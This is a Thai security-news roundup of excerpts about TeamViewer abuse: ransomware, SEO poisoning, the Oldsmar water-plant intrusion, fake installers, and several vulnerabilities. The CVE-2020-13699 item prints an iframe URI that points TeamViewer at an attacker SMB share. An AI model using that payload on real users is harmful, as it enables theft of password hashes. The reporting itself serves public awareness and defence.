นักวิจัยด้านความปลอดภัยทางไซเบอร์จาก Huntress ได้ออกมาแจ้งเตือนเกี่ยวกับการโจมตีทางไซเบอร์ที่กำลังถูกพบเพิ่มมากขึ้นเมื่อเร็ว ๆ นี้ โดยการใช้เทคนิคใหม่จากผู้ไม่หวังดีที่ใช้ TeamViewer เพื่อนำ LockBit ransomware มาติดตั้งบนระบบ

TeamViewer มีประวัติการถูกโจมตีในวงกว้างมาก่อนหน้านี้ โดยเมื่อล่าสุดผู้เชี่ยวชาญด้านความปลอดภัยทางไซเบอร์พบว่า มีการโจมตีโดยผู้ไม่หวังดีเพิ่มขึ้นจากการใช้ TeamViewer ซึ่งเป็นเครื่องมือในการเข้าถึงจากระยะไกล เพื่อนำ LockBit ransomware มาใช้ในการโจมตี ซึ่งอาจทำให้ผู้ใช้งานตกเป็นเป้าหมายของการเข้ารหัสข้อมูล และการเรียกค่าไถ่ (more…)

แคมเปญ search engine optimization (SEO) poisoning attack ถูกพบว่ากำลังใช้ประโยชน์จากความน่าเชื่อถือของซอฟต์แวร์แท้ ในการหลอกให้ผู้ใช้งานดาวน์โหลดมัลแวร์ BATLOADER

“ผู้ไม่ประสงค์ดี ใช้ธีม ‘ติดตั้งแอปพลิเคชันฟรี’ หรือ ‘เครื่องมือพัฒนาซอฟต์แวร์ฟรี’ เป็นคำค้นหาของ SEO เพื่อหลอกล่อเหยื่อไปยังเว็บไซต์ และดาวน์โหลดตัวติดตั้งซอฟต์แวร์ที่ฝังมัลแวร์ไว้” นักวิจัยจาก Mandiant กล่าวในรายงานที่เผยแพร่เมื่อสัปดาห์ที่ผ่านมา

ในการโจมตีด้วย SEO poisoning attacks ผู้ไม่ประสงค์ดีได้ทำการเพิ่มอันดับของเว็บไซต์ที่ใช้แพร่กระจายมัลแวร์บน search engine ทำให้เว็บไซต์เหล่านั้นขึ้นมาบนหน้าแรกของผลการค้นหาเมื่อผู้ใช้งานทั่วไปค้นหาซอฟต์แวร์ต่าง ๆ เช่น TeamViewer, Visual Studio, และ Zoom และหลงเข้าไปดาวน์โหลดซอฟต์แวร์ที่ถูกฝังมัลแวร์ไว้

ตัวติดตั้งที่ภายในประกอบไปด้วยซอฟต์แวร์แท้ จะถูก BATLOADER payload ผูกติดไปด้วยซึ่งจะทำการเปิดใช้งานระหว่างขั้นตอนการติดตั้ง หลังจากนั้นมัลแวร์ตัวนี้จะเป็นตัวที่ใช้หาข้อมูลเพิ่มเติมเกี่ยวกับระบบขององค์กรที่เป็นเป้าหมาย และใช้เพื่อดาวน์โหลดมัลแวร์อื่น ๆ เพื่อแพร่กระจายเป็นลูกโซ่ต่อไป

หนึ่งในไฟล์ที่ถูกดาวน์โหลดนั้น เป็นส่วนประกอบภายในของ Microsoft Windows ที่ถูกดัดแปลงด้วยการเพิ่ม VBScript ที่ไม่พึงประสงค์ โดยการโจมตีนี้ใช้เทคนิคที่เรียกว่า signed binary proxy execution เพื่อทำการรันไฟล์ DLL โดยใช้ "Mshta.

Bob Gualtieri นายอำเภอของเขต Pinellas County เมือง Oldsmar รัฐฟลอริดา ประเทศสหรัฐอเมริกา ได้แถลงถึงกรณีที่แฮกเกอร์ได้ทำการบุกรุกเข้าถึงระบบคอมพิวเตอร์ของโรงบำบัดน้ำในเมือง Oldsmar และได้ทำการปรับเปลี่ยนระบบการควบคุมระดับสารเคมีที่ใช้ในโรงบำบัดให้เป็นระดับที่เป็นอันตราย

การบุกรุกเกิดขึ้นในวันศุกร์ที่ 5 กุมภาพันธ์ที่ผ่านมา โดยการโจมตีดังกล่าวเกิดขึ้นก่อนการแข่งขัน Super Bowl LV ของ NFL ใน Tampa Bay เพียงสองวัน ซึ่งแฮกเกอร์ได้เข้าถึงระบบคอมพิวเตอร์ที่สามารถตั้งค่าการควบคุมระบบการบำบัดน้ำได้จากระยะไกลผ่านซอฟต์แวร์ TeamViewer ครั้งแรกเวลา 8.00 น และครั้งที่สอง 13.30 น. โดยการเข้าถึงระบบครั้งที่สองนี้เจ้าหน้าที่ผู้ปฏิบัติงานที่กำลังตรวจสอบระบบและเห็นแฮกเกอร์กำลังเลื่อนเคอร์เซอร์ของเมาส์บนหน้าจอเพื่อเข้าถึงซอฟต์แวร์ที่ใช้ในการบำบัดน้ำ

แฮกเกอร์ได้ทำการการตั้งค่าสารโซเดียมไฮดรอกไซด์ที่ถูกใช้เพื่อควบคุมความเป็นกรดของน้ำและกำจัดโลหะออกจากน้ำดื่มในโรงบำบัดน้ำ จากประมาณ 100 ส่วนต่อล้านเป็น 11,100 ส่วนต่อล้าน ซึ่งเป็นการเพิ่มขึ้นอย่างมีนัยสำคัญและอาจเป็นอันตรายต่อประชาชนในเมืองได้

เนื่องจากการโจมตีดังกล่าวถูกเจ้าหน้าที่ผู้ปฏิบัติงานตรวจจับได้ทันเวลาก่อนที่ระดับสารเคมีในน้ำจะถูกนำไปใช้ในระบบการส่งน้ำในเมืองและหลังจากการตรวจจับการโจมตี เจ้าหน้าที่ผู้ปฏิบัติงานได้ทำการแก้ไขระบบการตั้งค่าระดับสารเคมีให้กลับมาเป็นปกติทันที

ปัจจุบันทางการเมือง Pinellas County, หน่วยงาน FBI และหน่วย Secret Service ของสหรัฐ กำลังร่วมกันสอบสวนหาผู้กระทำการโจมตีครั้งนี้

ที่มา: zdnet, bleepingcomputer

TeamViewer ได้ออกเเพตซ์เเก้ไขช่องโหว่ที่อาจทำให้ผู้โจมตีสามารถเชี่อมต่อคอมพิวเตอร์ของผู้ใช้ได้ ซึ่งเมื่อโจมตีสำเร็จ ผู้โจมตีที่ไม่ได้เข้าสู่ระบบจะสามารถรันโค้ดได้จากระยะไกล หรือเพื่อดึงแฮชรหัสผ่านได้ โดยช่องโหว่นี้ถูกเปิดเผยโดย Jeffrey Hofmann วิศวกรด้านการรักษาความปลอดภัยจาก Praetorian

ช่องโหว่ CVE-2020-13699 จัดเป็นช่องโหว่ในประเภท Unquoted Search Path or Element (CWE-428) โดยช่องโหว่ประเภทนี้เกิดเนื่องจากการที่โปรแกรมรับค่า input มาโดยไม่ได้จัดการให้ดี เช่น ไม่มีเครื่องหมาย quoted (“) ครอบ ทำให้โปรแกรมแปลความหลายค่า input ที่ได้รับผิดพลาด มองค่า input ที่ได้รับเป็นคำสั่งของโปรแกรม ทำให้ผู้โจมตีสามารถใส่คำสั่งอันตรายลงไปใน input เพื่อให้โปรแกรมรันคำสั่งอันตรายได้

ผู้โจมตีสามารถใช้ประโยชน์จากช่องโหว่นี้โดยทำการฝั่ง iframe ที่เป็นอันตรายในเว็บไซต์ที่ผู้โจมตีสร้างขึ้น โดยถ้าหากผู้ใช้ TeamViewer คลิกลิงก์ที่อยู่ภายในเว็บไซต์ที่เป็นอันตรายนี้ โค้ดจาก iframe ที่ผู้โจมตีฝั่งไว้จะทำงาน ซึ่งผู้โจมตีสามารถระบุให้แอปพลิเคชัน TeamViewer ที่ติดตั้งในเครื่องให้ทำการเชื่อมต่อกับเซิร์ฟเวอร์ของผู้โจมตีผ่านโปรโตคอล Server Message Block (SMB) ได้จากการใส่คำสั่งใน iframe ว่า teamviewer10: --play \\attacker-IP\share\fake.

นักวิจัยความปลอดภัยของ Trend Micro ได้เปิดเผยว่าพบแคมเปญการใช้เครื่องมือ TeamViewer เพื่อแพร่กระจายมัลแวร์
เมื่อวันที่ 20 มกราคม นักวิจัยด้านความปลอดภัยที่ใช้ชื่อว่า "FewAtoms" บน Twitter พบ URL ที่เป็นอันตรายซึ่งพบว่ามีการเก็บไฟล์ประเภท self-extracting archive (ไฟล์ที่ถูกบีบอัดอย่าง rar หรือ zip ที่สามารถแตกตัวได้เอง) ที่เป็นมัลแวร์ประเภท Trojan หรือ Spyware จากการตรวจสอบโดยนักวิจัยของ Trend Micro พบว่าไฟล์ดังกล่าวถูกทำให้ดูเหมือนไฟล์ของ TeamViewer เพื่อรวบรวมและขโมยข้อมูลของผู้ใช้ ข้อมูลจะถูกส่งไปยัง C&C (hxxp://intersys32 [.] com)
นอกจากนี้นักวิจัยได้ตรวจสอบ C&C ดังกล่าวเพิ่มเติม และพบว่ามีมัลแวร์อื่นๆ ที่เกี่ยวข้องกับโดเมนดังกล่าวด้วย อย่างเช่น CoinSteal และ Fareit ซึ่งมัลแวร์ทั้งสองเป็นที่รู้จักกันดีในการถูกใช้เพื่อขโมยข้อมูลจากคอมพิวเตอร์ที่ตกเป็นเหยื่อ
อย่างไรก็ตามนี่ไม่ใช่ครั้งแรกที่ชื่อของ TeamViewer ถูกนำไปใช้เพื่อจุดประสงค์ในการแพร่กระจายมัลแวร์ ก่อนหน้านี้แฮ็กเกอร์ก็เคยใช้ TeamViewer ปลอมเพื่อขโมยข้อมูลผู้ใช้ และถูกตั้งชื่อว่า "TeamSpy"
เพื่อหลีกเลี่ยงการตกเป็นเหยื่อ ผู้ใช้งานควร
- หลีกเลี่ยงการดาวน์โหลดซอฟต์แวร์จาก third-party ที่ไม่ใช่เว็บไซต์ทางการ
- อัปเดตระบบปฏิบัติการและซอฟต์แวร์ที่ใช้งานอยู่ให้ล่าสุดอยู่เสมอ
- ใช้งานโปรแกรมจำพวก Anti-virus หรือ Endpoint Protection และอัปเดตให้ใหม่อยู่เสมอ รวมทั้งสแกนเครื่องอย่างสม่ำเสมอ
ที่มา: hackread

พบช่องโหว่ใน Team Viewer !!! ทำให้ผู้ไม่หวังดีสามารถเข้าควบคุมเครื่องได้

Team Viewer โปรแกรมยอดนิยม ที่ช่วยอำนวยความสะดวกในการ Meeting ผ่านระบบออนไลน์, แขร์หน้าจอและรีโมทระหว่างเครื่อง, ย้ายไฟล์ข้ามเครื่อง และอื่นๆ ล่าสุดได้มีการพบช่องโหว่บนโปรแกรม ส่งผลให้ผู้ไม่หวังดีสามารถรีโมทเข้าควบคุมเครื่องได้อย่างสมบูรณ์ โดยไม่ต้องได้รับอนุญาตจากผู้ใช้งานของเครื่อง

ช่องโหว่นี้ถูกค้นพบโดยผู้ใช้งานบน GitHub ที่ใช้ชื่อว่า “Gellin” จากวิธีการที่ได้เปิดเผยออกมาพบว่าเป็นการใช้ dll injection ซึ่งเขียนโดยใช้ C++ เข้าไปแก้ไขสิทธิ์ของ TeamViewer ใน memory โดยตรง จึงส่งผลให้ผู้ใช้งานจะไม่ได้รับการแจ้งเตือนใดๆเลยเมื่อสิทธิ์ถูกปลี่ยน จากการทดสอบบน TeamViewer x86 V.13.0.5058 ได้แสดงให้เห็นว่าหากผู้โจมตีเป็นฝั่ง “Presenter” จะสามารถเรียกใช้ความสามารถ “switch sides” เพื่อเข้าควบคุมเครื่องที่เป็นฝั่ง “Viewer” ได้โดยไม่ต้องรับอนุญาตจากเจ้าของเครื่อง แต่หากผู้โจมตีเป็นฝั่ง “Viewer” จะทำให้สามารถควบคุม mouse ในฝั่งของ “Presenter” ได้

ช่องโหว่นี้ส่งผลกระทบกับ TeamViewer ทั้งบน macOS, Linux และ Windows ในส่วนของ Patch ทางฝั่ง Windows นั้น จากรายงานได้ระบุว่า มีการปล่อยออกมาให้อัพเดทตั้งแต่เมื่อวันอังคารแล้ว แต่ในส่วนของ Linux และ macOS นั้น คาดว่าจะมีการปล่อยออกมาให้อัพเดทในวันอังคาร หรือพุธที่จะถึงนี้ โดยโปรแกรมจะได้รับการอัพเดทให้โดยอัตโนมัติหากมีการเปิดความสามารถนี้เอาไว้ แต่หากไม่ได้เปิดให้อัพเดทอัตโนมัติ ผู้ใช้งานจะได้รับการแจ้งเตือนเมื่อมีการประกาศ Patch ใหม่ออกมา

ที่มา : hackread

มัลแวร์ TeamSpy ใช้ TeamViewer ในการเข้าควบคุมและสั่งการเครื่องของเหยื่อ Avast ได้มีการเผยแพร่ผลการวิเคราะห์มัลแวร์ TeamSpy ซึ่งเคยมีการแพร่กระจายครั้งแรกในช่วงปี 2013 โดยมีการแอบติดตั้งโปรแกรม TeamViewer ที่มีการปรับแต่งเอาไว้เพื่อให้เข้าถึงเครื่องที่มีการติดเชื้อภายหลังได้
TeamSpy มีการแพร่กระจายผ่านทางไฟล์เอกสารที่ัฝังมาโครสคริปต์ที่เป็อันตรายเอาไว้ ในกรณีที่มาโครสคริปต์นั้นถูกรัน มันจะทำการดาวโหลดไฟล์ที่มีนามสกุล PNG แต่แท้จริงแล้วเป็นไฟล์โปรแกรมมาติดตั้งบนเครื่องของเหยื่อ
หลังจากมัลแวร์มีการติดตั้งไฟล์ดังกล่าวแล้ว ไฟล์ที่ถูกติดตั้งทั้งหมดจะเป็นไฟล์ของโปรแกรม TeamViewer โดยมีเพียงสองไฟล์ที่ไม่ได้มีการรับรองด้วยลายเซ็นดิจิตอลจาก TeamViewer คือ msimg32.dll และ tvr.

หลังจากมีผู้ใช้ TeamViewer หลายรายแจ้งว่าไม่สามารถล็อกอินเข้าใช้บริการได้ ประกอบกับทางทวิตเตอร์ของ TeamViewer (@TeamViewer_help) ได้แจ้งว่ามีปัญหาด้านเครือข่าย อยู่ระหว่างการแก้ไข ต่อมา ผู้ใช้หลายรายได้แจ้งว่าเครื่องคอมพิวเตอร์ที่ติดตั้ง TeamViewer ไว้ ถูกล็อกอินเข้ามาใช้งานโดยบุคคลอื่น ผู้ใช้บางรายพบว่ามีผู้เชื่อมต่อเข้ามาแล้วใช้โปรแกรมดูรหัสผ่านที่ถูกบันทึกไว้ในเบราว์เซอร์เพื่อนำไปใช้ขโมยเงินจากธนาคารออนไลน์ ผู้ใช้บางรายถูกติดตั้งมัลแวร์เรียกค่าไถ่ลงในเครื่อง

โดยทาง TeamViewer แจ้งว่าปัญหาที่ทำให้ระบบล่มเกิดจากเซิร์ฟเวอร์ DNS ถูกโจมตี แต่ปฏิเสธว่าระบบไม่ได้ถูกเจาะจนเป็นเหตุให้ผู้ใช้ถูกล็อกอินโดยบุคคลอื่น ซึ่งทางทีมงานอ้างว่าผู้ใช้ที่ถูกขโมยบัญชีเกิดจากการที่ตั้งรหัสผ่านสำหรับล็อกอินเป็นรหัสผ่านเดียวกับบริการอื่นที่เคยถูกแฮกไปก่อนหน้านี้แล้วมีการเผยแพร่รหัสผ่านดังกล่าวบนอินเทอร์เน็ต อย่างไรก็ตาม เรื่องนี้มีประเด็นข้อสงสัยหลายจุด เช่น ผู้ใช้บางรายอ้างว่าถูกแฮกได้ถึงแม้ไม่ได้ตั้งรหัสผ่านซ้ำกับบริการอื่นเลย รวมถึงสำนักข่าว The Register ยังพบข้อสังเกตว่ามีผู้ใช้บางรายถูกล็อกอินได้ถึงแม้จะมีการเปิดใช้งานการยืนยันตัวตนสองขั้นตอน (two factor Authentication)

โดยทาง Teamviewer ออกมาแนะนำให้ผู้ใช้งานดำเนินการเพื่อความปลอดภัยดังต่อไปนี้

สร้าง password สำหรับแต่ละ account
ไม่แจกหรือบอก password แก่ผู้อื่น
มีการเปลี่ยน password อยู่เสมอ
ไม่ใช้ข้อมูลในเชิง identifiable information เป็นส่วนหนึ่งใน password (วันเดือนปีเกิด,เบอร์มือถือ)
ใช้การยืนยันตัวตนชนิด two factor Authentication
ไม่จดหรือจัดเก็บ password ในรูปแบบ Plain text หรือง่ายต่อการลักลอบใช้จากผู้อื่น

ที่มา : ThaiCERT

รายงานช่องโหว่ Ceriti-Gate ที่เป็นช่องโหว่ของซอฟต์แวร์ซัพพอร์ตลูกค้าจากระยะไกล (mobile remote support tools - mRSTs) ที่สามารถเข้าควบคุมเครื่องได้แทบทุกรูปแบบ ทั้งการสั่งติดตั้งแอพพลิเคชั่น, จับภาพหน้าจอ, ควบคุมอินพุต ซึ่งแอพพลิเคชั่นเหล่านี้แบ่งออกเป็น 2 ส่วน คือแอพหลักและปลั๊กอิน โดยแอพหลักจะใช้สิทธิ์ไม่ต่างจากแอพทั่วๆ ไป แต่ส่วนปลั๊กอินจะมีสิทธิระดับลึกกว่า ซึ่งจะได้รับการรับรองจากผู้ผลิตโดยตรงทำให้เข้าถึงฟังก์ชั่นที่ปกตินักพัฒนาทั่วไปเข้าถึงไม่ได้ เมื่อผู้ใช้ติดตั้งแอพหลัก ตัวปลั๊กอินมักตรวจสอบแอพหลักว่ามาจากผู้ผลิตที่ถูกต้องหรือไม่ ทีมวิจัยพบว่าปลั๊กอินหลายตัวมีกระบวนการตรวจสอบผู้ผลิตที่หละหลวม ทำให้แฮกเกอร์สามารถปลอมตัวเพื่อหลอกปลั๊กอินได้โดยง่าย

ทีมวิจัยรายงานถึงผู้ผลิต 3 รายที่มีช่องโหว่ในกระบวนการตรวจสอบแอพหลัก ได้แก่ TeamViewer, RSupport และ CommuniTake

TeamViewer อาศัยหมายเลขซีเรียลของใบรับรอง ทำให้แฮกเกอร์สามารถสร้างแอพปลอมที่ใช้ใบรับรองที่สร้างขึ้นเองและมีหมายเลขซีเรียลตรงกัน
RSupport อาศัยค่าแฮชของใบรับรอง แต่ฟังก์ชั่นแฮชกลับอ่อนแอ ขนาดค่าแฮชมีขนาดเพียง 32 บิต
CommuniTake คอนฟิกเซิร์ฟเวอร์ที่ใช้เชื่อมต่อผ่านทาง SMS ทำให้ผู้ผลิตสามารถส่ง SMS มาบอกให้แอพเชื่อมต่อกลับไปยังเซิร์ฟเวอร์ได้ โดยล็อกว่าโดเมนระดับบนสุดต้องเป็นโดเมนของ CommuniTake เอง แต่ตัวอ่าน URL มีบั๊กทำให้แฮกเกอร์สามารถส่ง SMS หลอกเพื่อให้ตัวแอพเชื่อมต่อไปยังเครื่องใดๆ ก็ได้

โทรศัพท์ยี่ห้อหลักๆ หลายรุ่นติดตั้งแอพพลิเคชั่นเหล่านี้มาจากโรงงานทำให้จำนวนอุปกรณ์ที่ได้รับผลกระทบมีสูงถึงหลายล้านเครื่อง

ที่มา : blognone